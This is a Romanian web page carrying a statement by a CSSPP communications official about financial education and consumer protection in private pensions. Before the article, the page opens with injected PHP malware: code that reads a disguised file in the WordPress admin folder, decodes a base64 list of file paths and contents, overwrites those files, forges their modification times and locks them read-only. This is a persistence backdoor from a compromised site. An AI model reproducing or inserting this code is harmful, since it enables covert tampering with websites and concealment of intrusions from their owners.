$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Un consumator bine informat poate face regulile jocului – O noua atitudine

De ce este importanta educatia financiara? Informarea corecta este cea mai buna masura de siguranta! Trebuie sa stim ce drepturi si obligatii avem pentru a aprecia corect nevoile, riscurile si oportunitatile, pentru a intelege corect concepte precum investitie, economie, asigurare sau pensie privata.
Accesul la educaţie financiara este deosebit de important, mai ales în contextul dificil al pieţelor financiare din întreaga lume.

CSSPP a parcurs etape importante  în implementarea celor mai moderne mecanisme de protecţia şi informare a consumatorului. Totodata institutia noastra a pus un accent important pe educatie financiara si informare. Este de datoria noastră, ca instituţie cu rol central în cadrul sistemului de pensii private, să asigurăm informarea corectă a publicului. De altfel, informarea corectă este cea mai eficientă dintre metodele de protecţie a participanţilor.
În perioada ce a precedat punctului culminant al crizei financiare, educaţie financiară a început să fie recunoscută drept una dintre deprinderile individuale majore în majoritatea economiilor lumii. Motivele de bază pentru creşterea în importanţă a acestui domeniu includ tendinţa de transfer a unei game din ce în ce mai largi de riscuri (financiare) către consumatori, tendinţa de creştere în complexitate a serviciilor financiare, ritmul de evoluţie a pieţelor financiare, numărul din ce în ce mai mare de consumatori-investitori activi precum şi recunoaşterea limitelor instrumentului de reglementare ca singură unealtă de protecţie a consumatorilor.
Fără accesul la informatie si fara protectia asigurata atat de furnizori cat si de ONG-uri si autoritati, riscul ca aceşti consumatori de servicii financiare să intre in impas financiar este mare, existând posibilitatea apariţiei cazurilor de supra- îndatorare, a intrării în imposibilitatea de a achita ratele, cu efecte negative asupra situaţiei economico-sociale a acestei categorii, şi nu numai.

CSSPP dispune de proceduri interne detaliate privind soluţionarea petiţiilor adresate instituţiei. Acordăm o importanţă deosebită analizării şi rezolvării petiţiilor.

In privinta informarii, CSSPP se doreste a fi principalul furnizor de materiale de educatie financiara, de analize, studii si publicatii privind pensiile private. Nu ne limitam doar la rolul principal de supraveghere si control al pietei. Elaboram publicatii specifice de informare cu tematici de interes pentru participanti, studii si analize de piata, buletine lunare, precum şi  rapoarte trimestriale, semestriale si anuale, atat in forma electronica cat si tiparita.

Multumim pe aceasta cale Asociatiei NAtionale pentru Protectia Consumatorilor si Promovarea Programelor si Strategiilor din Romania – InfoCons pentru sprijinul acordat in cadrul campaniilor noastre de informare si educatie financiara. Fara acest sprijin nu am fi putut ajunge la un numar atat de mare de consumatori. Consumatorii informati sunt cetateni mai bine protejati in fata riscurilor financiare.”

 

Dan Zăvoianu,

Şef Serviciu Direcţia Comunicare şi Relaţii Publice Comisia de Supraveghere a Sistemului de Pensii Private – CSSPP

By o9admin